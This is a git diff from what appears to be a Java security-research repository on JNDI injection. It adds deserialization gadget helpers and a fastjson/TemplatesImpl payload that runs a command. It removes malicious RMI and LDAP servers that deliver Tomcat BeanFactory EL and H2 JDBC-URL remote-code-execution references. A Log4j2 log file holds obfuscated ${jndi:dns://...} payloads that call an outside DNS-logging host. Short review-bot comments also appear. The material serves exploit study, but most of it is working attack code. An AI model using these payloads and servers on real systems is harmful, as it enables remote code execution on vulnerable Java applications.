@@ -0,0 +1,8 @@ +package remoteObj; + +import java.rmi.Remote; +import java.rmi.RemoteException; + +public interface Hello extends Remote { + public String hello(String name) throws RemoteException; +} diff --git a/JNDI/JNDI/src/main/java/remoteObj/HelloImpl.java b/JNDI/JNDI/src/main/java/remoteObj/HelloImpl.java new file mode 100644 index 0000000..291d8c1 --- /dev/null +++ b/JNDI/JNDI/src/main/java/remoteObj/HelloImpl.java @@ -0,0 +1,14 @@ +package remoteObj; + +import java.rmi.RemoteException; +import java.rmi.server.UnicastRemoteObject; + +public class HelloImpl extends UnicastRemoteObject implements Hello { + public HelloImpl() throws RemoteException { + } + + @Override + public String hello(String name) throws RemoteException { + return "hello " + name; + } +} diff --git a/JNDI/JNDI/src/main/java/tools/ClassByteGen.java b/JNDI/JNDI/src/main/java/tools/ClassByteGen.java new file mode 100644 index 0000000..9275013 --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/ClassByteGen.java 
@@ -0,0 +1,29 @@ +package tools; + +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtConstructor; + +public class ClassByteGen { + public static byte[] getBytes(String code, String className) throws Exception { +// String Abstract = "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"; + ClassPool pool = ClassPool.getDefault(); +// pool.importPackage(Abstract); + pool.importPackage("java.io"); + pool.importPackage("java.nio.file"); + pool.importPackage("java.lang.reflect"); + pool.importPackage("java.nio.charset"); + pool.importPackage("java.util"); +// pool.insertClassPath(Abstract); +// pool.insertClassPath("java.nio"); + CtClass ctClass = pool.makeClass(className); +// ctClass.setSuperclass(pool.get(Abstract)); + CtConstructor ctConstructor = ctClass.makeClassInitializer(); + ctConstructor.setBody(code); +// CtConstructor ctConstructor1 = new CtConstructor(new CtClass[]{}, ctClass); +// ctConstructor1.setBody(code); +// ctClass.addConstructor(ctConstructor1); + ctClass.writeFile("ClassByteGen"); + return ctClass.toBytecode(); + } +} diff --git a/JNDI/JNDI/src/main/java/tools/InvocationHandlerImpl.java b/JNDI/JNDI/src/main/java/tools/InvocationHandlerImpl.java new file mode 100644 index 0000000..7c15d95 --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/InvocationHandlerImpl.java @@ -0,0 +1,19 @@ +package tools; + +import java.io.Serializable; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Method; + +// 动态代理,实现对象接口转化 +public class InvocationHandlerImpl implements InvocationHandler, Serializable { + private Object object; + + public InvocationHandlerImpl(Object obj) { + this.object = obj; + } + + @Override + public Object invoke(Object proxy, Method method, Object[] args) throws Throwable { + return null; + } +} diff --git a/JNDI/JNDI/src/main/java/tools/Payload.java b/JNDI/JNDI/src/main/java/tools/Payload.java new file mode 100644 index 0000000..5396724 --- /dev/null 
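Review bot: `getBytes` calls `ctClass.writeFile("ClassByteGen")` before returning the bytecode, so a method named as a pure byte generator also writes a `.class` file under `./ClassByteGen/` on every call; a leftover debugging aid like this should be removed or made opt-in via a parameter, and the behaviour documented if it stays. The eight commented-out lines (`Abstract`, `insertClassPath`, `setSuperclass`, the alternative `CtConstructor`) are dead code that belongs in version history rather than the method body.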
+++ b/JNDI/JNDI/src/main/java/tools/Payload.java @@ -0,0 +1,10 @@ +package tools; + +public abstract class Payload { +// public Templates getTemplates(byte[] byteCode, String bytePath) throws Exception { +// Templates templates = TemplatesGen.getTemplates(byteCode, bytePath); +// return templates; +// } + + public abstract String getPayload(byte[] byteCode, String bytePath) throws Exception; +} diff --git a/JNDI/JNDI/src/main/java/tools/PayloadGen.java b/JNDI/JNDI/src/main/java/tools/PayloadGen.java new file mode 100644 index 0000000..475286b --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/PayloadGen.java @@ -0,0 +1,23 @@ +package tools; + +import com.alibaba.fastjson.JSONArray; + +import javax.management.BadAttributeValueExpException; +import javax.xml.transform.Templates; + +public class PayloadGen { + public static Object getPayload() throws Exception { + String code = "{\n" + + " Runtime.getRuntime().exec(\"calc\");\n" + + " }"; + byte[] bytes = ClassByteGen.getBytes(code, "AAAA"); + Templates templates = TemplatesGen.getTemplates(bytes, null); + JSONArray jsonArray = new JSONArray(); + jsonArray.add(templates); + + BadAttributeValueExpException bad = new BadAttributeValueExpException("aaa"); + ReflectTools.setFieldValue(bad, "val", jsonArray); + + return bad; + } +} diff --git a/JNDI/JNDI/src/main/java/tools/ReflectTools.java b/JNDI/JNDI/src/main/java/tools/ReflectTools.java new file mode 100644 index 0000000..e064009 --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/ReflectTools.java 
@@ -0,0 +1,71 @@ +package tools; + +import javassist.CannotCompileException; +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtField; + +import java.io.*; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Modifier; +import java.lang.reflect.Proxy; +import java.util.Base64; + +public class ReflectTools { + public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException { + Class aClass = obj.getClass(); + Field field = null; + try { + field = aClass.getDeclaredField(fieldName); + } catch (NoSuchFieldException e) { + aClass = aClass.getSuperclass(); + } + field.setAccessible(true); + field.set(obj, value); + } + + // 生成不继承Serializable接口的Class,防止因suid不一样报错 + public static Class makeClass(String className, String suid) throws ClassNotFoundException, CannotCompileException { + ClassPool pool = ClassPool.getDefault(); + CtClass ctClass = pool.makeClass(className); + + if (suid != null) { + // 添加 serialVersionUID 字段并指定其值 + CtField serialVersionUIDField = new CtField(CtClass.longType, "serialVersionUID", ctClass); + serialVersionUIDField.setModifiers(Modifier.PRIVATE | Modifier.STATIC | Modifier.FINAL); // 设置为private static final + ctClass.addField(serialVersionUIDField, suid); // 设置 serialVersionUID 值为 1L + } + + Class aClass = ctClass.toClass(); + return aClass; + } + + public static byte[] ser2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(baos); + oos.writeObject(obj); + return baos.toByteArray(); + } + + public static void ser2file(Object obj, String fileName) throws IOException { + FileOutputStream fos = new FileOutputStream(fileName); + ObjectOutputStream oos = new ObjectOutputStream(fos); + oos.writeObject(obj); + } + + public static Object deser(byte[] bytes, String base64) throws IOException, ClassNotFoundException { + if (bytes != null) { + 
ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + ObjectInputStream ois = new ObjectInputStream(bais); + return ois.readObject(); + }else { + byte[] decode = Base64.getDecoder().decode(base64); + ByteArrayInputStream bais = new ByteArrayInputStream(decode); + ObjectInputStream ois = new ObjectInputStream(bais); + return ois.readObject(); + } + } + + +} diff --git a/JNDI/JNDI/src/main/java/tools/TemplatesGen.java b/JNDI/JNDI/src/main/java/tools/TemplatesGen.java new file mode 100644 index 0000000..5fbf00d --- /dev/null +++ b/JNDI/JNDI/src/main/java/tools/TemplatesGen.java @@ -0,0 +1,35 @@ +package tools; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.CannotCompileException; +import javassist.ClassPool; +import javassist.CtClass; + +import javax.xml.transform.Templates; +import java.io.IOException; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class TemplatesGen { + public static Templates getTemplates(byte[] byteCode, String bytePath) throws IOException, IllegalAccessException, CannotCompileException { + byte[] evilBytes; + if (byteCode != null) { + evilBytes = byteCode; + }else { + evilBytes = Files.readAllBytes(Paths.get(bytePath)); + } + TemplatesImpl templates = new TemplatesImpl(); + ClassPool pool = ClassPool.getDefault(); + CtClass ctClass = pool.makeClass("useless"); + byte[] useless = ctClass.toBytecode(); + ReflectTools.setFieldValue(templates, "_name", "1diot9"); + ReflectTools.setFieldValue(templates, "_class", null); +// ReflectTools.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + ReflectTools.setFieldValue(templates, "_transletIndex", 0); + // 修改bytecodes数量和transletIndex,这样就不用继承AbstractTranslet + ReflectTools.setFieldValue(templates, "_bytecodes", new byte[][]{evilBytes, useless}); + return templates; + } + +} 
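Review bot: In `setFieldValue` the `catch (NoSuchFieldException e)` block only reassigns `aClass = aClass.getSuperclass()` and never looks the field up again, so `field` stays `null` and the following `field.setAccessible(true)` throws a `NullPointerException` that hides both the field name and the original cause; if the retry is not implemented, at least rethrow with context, `throw new IllegalArgumentException("no field " + fieldName + " on " + obj.getClass(), e);`. `ser2file` opens a `FileOutputStream` and an `ObjectOutputStream` and never closes either, leaking the file descriptor until garbage collection; wrap both in try-with-resources (`ser2bytes` should close its `ObjectOutputStream` too). `deser` runs an unfiltered `ObjectInputStream.readObject()` on whatever bytes or Base64 string it receives, which is acceptable for fixtures this repository generates itself but must never be pointed at external input without an `ObjectInputFilter`; a one-line comment stating that scope would prevent accidental reuse.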
diff --git a/JNDI/JNDI_vul/.idea/encodings.xml b/JNDI/JNDI_vul/.idea/encodings.xml deleted file mode 100644 index 8c3a518..0000000 --- a/JNDI/JNDI_vul/.idea/encodings.xml +++ /dev/null @@ -1,11 +0,0 @@ - - - - - - - - - - - \ No newline at end of file diff --git a/JNDI/JNDI_vul/client/pom.xml b/JNDI/JNDI_vul/client/pom.xml deleted file mode 100644 index 09045e5..0000000 --- a/JNDI/JNDI_vul/client/pom.xml +++ /dev/null @@ -1,20 +0,0 @@ - - - 4.0.0 - - org.example - JNDI - 1.0-SNAPSHOT - - - client - - - 8 - 8 - UTF-8 - - - \ No newline at end of file diff --git a/JNDI/JNDI_vul/pom.xml b/JNDI/JNDI_vul/pom.xml deleted file mode 100644 index d79e385..0000000 --- a/JNDI/JNDI_vul/pom.xml +++ /dev/null @@ -1,93 +0,0 @@ - - - 4.0.0 - - org.example - JNDI - 1.0-SNAPSHOT - pom - - server - client - - - - 8 - 8 - UTF-8 - - - - - com.unboundid - unboundid-ldapsdk - 3.2.0 - test - - - com.unboundid - unboundid-ldapsdk - 3.2.0 - compile - - - org.apache.tomcat - tomcat-catalina - 8.5.51 - - - org.apache.tomcat - tomcat-jasper - 8.5.51 - - - commons-collections - commons-collections - 3.2.1 - - - - org.apache.xbean - xbean-reflect - 4.18 - - - - - com.h2database - h2 - 2.2.220 - - - - - - commons-dbcp - commons-dbcp - 1.4 - - - - commons-pool - commons-pool - 1.5.4 - - - - - org.apache.commons - commons-dbcp2 - 2.9.0 - - - - - org.apache.tomcat - tomcat-jdbc - 8.5.51 - - - - \ No newline at end of file diff --git a/JNDI/JNDI_vul/server/pom.xml b/JNDI/JNDI_vul/server/pom.xml deleted file mode 100644 index 1634d2a..0000000 --- a/JNDI/JNDI_vul/server/pom.xml +++ /dev/null @@ -1,20 +0,0 @@ - - - 4.0.0 - - org.example - JNDI - 1.0-SNAPSHOT - - - server - - - 8 - 8 - UTF-8 - - - \ No newline at end of file diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/EL_test.java b/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/EL_test.java deleted file mode 100644 index 49ee34e..0000000 
--- a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/EL_test.java +++ /dev/null @@ -1,15 +0,0 @@ -package factory.beanFactory; - -import javax.el.ELProcessor; - -public class EL_test { - public static void main(String[] args) { - ELProcessor elProcessor = new ELProcessor(); - // 将 Runtime 对象注入到 EL 上下文中 - elProcessor.defineBean("runtime", Runtime.getRuntime()); - - // 使用 EL 表达式调用 exec 方法 - String expression = "${runtime.exec('calc')}"; - elProcessor.eval(expression); - } -} diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/JNDIBypassHighJavaServerEL.java b/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/JNDIBypassHighJavaServerEL.java deleted file mode 100644 index 2ac7315..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/JNDIBypassHighJavaServerEL.java +++ /dev/null 
@@ -1,31 +0,0 @@ -package factory.beanFactory; - -import com.sun.jndi.rmi.registry.ReferenceWrapper; -import org.apache.naming.ResourceRef; - -import javax.naming.StringRefAddr; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; - -// JNDI 高版本 jdk 绕过服务端,用 bind 的方式 -public class JNDIBypassHighJavaServerEL { - public static void main(String[] args) throws Exception { - System.out.println("[*]Evil RMI Server is Listening on port: 1099"); - Registry registry = LocateRegistry.createRegistry(1099); - - // 实例化Reference,指定目标类为javax.el.ELProcessor,工厂类为org.apache.naming.factory.BeanFactory - ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", - true,"org.apache.naming.factory.BeanFactory",null); - - // 强制将'x'属性的setter从'setX'变为'eval', 详细逻辑见BeanFactory.getObjectInstance代码 - ref.add(new StringRefAddr("forceString", "x=eval")); - - // 利用表达式执行命令 - ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\")" + - ".newInstance().getEngineByName(\"JavaScript\")" + - ".eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")")); - System.out.println("[*]Evil command: calc"); - ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref); - registry.bind("Object", referenceWrapper); -} -} \ No newline at end of file diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/trustSerialFalse/ldapserver.java b/JNDI/JNDI_vul/server/src/main/java/factory/trustSerialFalse/ldapserver.java deleted file mode 100644 index 65adc37..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/trustSerialFalse/ldapserver.java +++ /dev/null 
@@ -1,61 +0,0 @@ -package factory.trustSerialFalse; - -import com.unboundid.ldap.listener.InMemoryDirectoryServer; -import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; -import com.unboundid.ldap.listener.InMemoryListenerConfig; -import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; -import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; -import com.unboundid.ldap.sdk.Entry; -import com.unboundid.ldap.sdk.LDAPResult; -import com.unboundid.ldap.sdk.ResultCode; - -import javax.net.ServerSocketFactory; -import javax.net.SocketFactory; -import javax.net.ssl.SSLSocketFactory; -import java.net.InetAddress; - -public class ldapserver { - public static void main(String[] args) { - try { - InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig("dc=example,dc=com"); - config.setListenerConfigs(new InMemoryListenerConfig( - "listen", - InetAddress.getByName("0.0.0.0"), - 1389, - ServerSocketFactory.getDefault(), - SocketFactory.getDefault(), - (SSLSocketFactory) SSLSocketFactory.getDefault())); - - config.addInMemoryOperationInterceptor(new OperationInterceptor()); - InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); - System.out.println("[LDAP] Listening on 0.0.0.0:1389"); - ds.startListening(); - } catch (Exception e) { - e.printStackTrace(); - } - } - //tomcat-jdbc + h2 - //decodeReference 绕过decodeObject,打本地工厂 - public static class OperationInterceptor extends InMemoryOperationInterceptor { - - @Override - public void processSearchResult(InMemoryInterceptedSearchResult searchResult) { - String base = searchResult.getRequest().getBaseDN(); - Entry e = new Entry(base); - e.addAttribute("objectClass","javaNamingReference"); - - e.addAttribute("javaClassName", "javax.sql.DataSource"); - e.addAttribute("javaFactory","org.apache.tomcat.jdbc.pool.DataSourceFactory"); - String JDBC_URL = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS 'String shellexec(String cmd) 
throws java.io.IOException {Runtime.getRuntime().exec(cmd)\\;return \"1\"\\;}'\\;CALL EXEC ('calc')"; - e.addAttribute("javaReferenceAddress",new String[]{"/0/url/"+JDBC_URL,"/1/driverClassName/org.h2.Driver","/2/username/Squirt1e","/3/password/Squirt1e","/4/initialSize/1"}); - - - try { - searchResult.sendSearchEntry(e); - searchResult.setResult(new LDAPResult(0, ResultCode.SUCCESS)); - } catch (Exception ex) { - ex.printStackTrace(); - } - } - } -} diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/dbcp.java b/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/dbcp.java deleted file mode 100644 index bb0045b..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/dbcp.java +++ /dev/null 
@@ -1,48 +0,0 @@ -package factory.withJDBC.rmi; - -import com.sun.jndi.rmi.registry.ReferenceWrapper; - -import javax.naming.NamingException; -import javax.naming.Reference; -import javax.naming.StringRefAddr; -import java.rmi.AlreadyBoundException; -import java.rmi.RemoteException; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; - -public class dbcp { - public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException { - Registry registry = LocateRegistry.createRegistry(1099); - Reference reference = commons_dbcp2_RCE(); - ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); - registry.bind("Object", referenceWrapper); - - - } - - private static Reference tomcat_dbcp2_RCE(){ - return dbcpByFactory("org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory"); - } - private static Reference tomcat_dbcp1_RCE(){ - return dbcpByFactory("org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory"); - } - private static Reference commons_dbcp2_RCE(){ - return dbcpByFactory("org.apache.commons.dbcp2.BasicDataSourceFactory"); - } - private static Reference commons_dbcp1_RCE(){ - return dbcpByFactory("org.apache.commons.dbcp.BasicDataSourceFactory"); - } - private static Reference dbcpByFactory(String factory){ - Reference ref = new Reference("javax.sql.DataSource",factory,null); - String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" + - "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" + - "java.lang.Runtime.getRuntime().exec('calc')\n" + - "$$\n"; - ref.add(new StringRefAddr("driverClassName","org.h2.Driver")); - ref.add(new StringRefAddr("url",JDBC_URL)); - ref.add(new StringRefAddr("username","root")); - ref.add(new StringRefAddr("password","password")); - ref.add(new StringRefAddr("initialSize","1")); - return ref; - } -} 
diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/tomcat_dbcp.java b/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/tomcat_dbcp.java deleted file mode 100644 index dfd49ea..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/tomcat_dbcp.java +++ /dev/null @@ -1,36 +0,0 @@ -package factory.withJDBC.rmi; - -import com.sun.jndi.rmi.registry.ReferenceWrapper; - -import javax.naming.Reference; -import javax.naming.StringRefAddr; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; - -public class tomcat_dbcp { - public static void main(String[] args) throws Exception { - Registry registry = LocateRegistry.createRegistry(1099); - Reference reference = tomcat_JDBC_RCE(); - ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); - registry.bind("Object", referenceWrapper); - } - - - private static Reference tomcat_JDBC_RCE(){ - return dbcpByFactory("org.apache.tomcat.jdbc.pool.DataSourceFactory"); - } - private static Reference dbcpByFactory(String factory){ - Reference ref = new Reference("javax.sql.DataSource",factory,null); - String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" + - "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" + - "java.lang.Runtime.getRuntime().exec('calc')\n" + - "$$\n"; - ref.add(new StringRefAddr("driverClassName","org.h2.Driver")); - ref.add(new StringRefAddr("url",JDBC_URL)); - ref.add(new StringRefAddr("username","root")); - ref.add(new StringRefAddr("password","password")); - ref.add(new StringRefAddr("initialSize","1")); - return ref; - } - -} diff --git a/JNDI/JNDI_vul/.gitignore b/JNDI/Log4j2/.gitignore similarity index 100% rename from JNDI/JNDI_vul/.gitignore rename to JNDI/Log4j2/.gitignore diff --git a/JNDI/JNDI_vul/.idea/.gitignore b/JNDI/Log4j2/.idea/.gitignore similarity index 100% rename from JNDI/JNDI_vul/.idea/.gitignore rename to JNDI/Log4j2/.idea/.gitignore 
diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.agent.xml b/JNDI/Log4j2/.idea/copilot.data.migration.agent.xml new file mode 100644 index 0000000..4ea72a9 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.ask.xml b/JNDI/Log4j2/.idea/copilot.data.migration.ask.xml new file mode 100644 index 0000000..7ef04e2 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.ask.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.ask2agent.xml b/JNDI/Log4j2/.idea/copilot.data.migration.ask2agent.xml new file mode 100644 index 0000000..1f2ea11 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.ask2agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.edit.xml b/JNDI/Log4j2/.idea/copilot.data.migration.edit.xml new file mode 100644 index 0000000..8648f94 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.edit.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/.idea/encodings.xml b/JNDI/Log4j2/.idea/encodings.xml new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ b/JNDI/Log4j2/.idea/encodings.xml @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/JNDI/JNDI_vul/.idea/misc.xml b/JNDI/Log4j2/.idea/misc.xml similarity index 100% rename from JNDI/JNDI_vul/.idea/misc.xml rename to JNDI/Log4j2/.idea/misc.xml diff --git a/JNDI/JNDI_vul/.idea/vcs.xml b/JNDI/Log4j2/.idea/vcs.xml similarity index 100% rename from JNDI/JNDI_vul/.idea/vcs.xml rename to JNDI/Log4j2/.idea/vcs.xml diff --git a/JNDI/Log4j2/logs/app.log b/JNDI/Log4j2/logs/app.log new file mode 100644 index 0000000..5bab32d --- /dev/null +++ b/JNDI/Log4j2/logs/app.log 
@@ -0,0 +1,125 @@ +2025-12-08 14:03:20 INFO com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:03:20 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:03:20 ERROR com.example.spring.controller.IndexController - Hello, World +2025-12-08 14:03:26 INFO com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:03:26 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dUq1$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/ user +2025-12-08 14:03:27 ERROR com.example.spring.controller.IndexController - Hello, World +2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:03:50 ERROR com.example.spring.controller.IndexController - Hello, 123 +2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dWfi%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:03:50 ERROR com.example.spring.controller.IndexController - Hello, ${jndi:dns://0${::-.}get${::-.}127${::-.}0${::-.}0${::-.}1${::-.}8005${::-.}Wfi${::-.}hpdth2${::-.}ceye${::-.}io/ user} +2025-12-08 14:05:06 INFO 
com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:05:06 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:05:06 ERROR com.example.spring.controller.IndexController - Hello, World +2025-12-08 14:06:35 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:06:35 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24%7b::-n%7ddi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dTOn%24%7b::-.%7d2%24%7b::-.%7d1%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dTVK%24%7b::-.%7d2%24%7b::-.%7d0%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/132.0.0.0 Safari/537.36n%7ddi:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dTOn$%7b::-.%7d3$%7b::-.%7d1$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dTVK$%7b::-.%7d3$%7b::-.%7d0$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user +2025-12-08 14:11:28 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:11:28 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:11:34 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:11:34 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:11:48 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:11:48 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:13:12 ERROR com.example.spring.controller.IndexController - Referer: 127 +2025-12-08 14:13:12 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:13:30 ERROR com.example.spring.controller.IndexController - Referer: 127 +2025-12-08 14:13:30 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:21:27 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:21:27 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:21:33 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:21:33 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.dzu3.hpdth2.ceye.io/user} +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:24:53 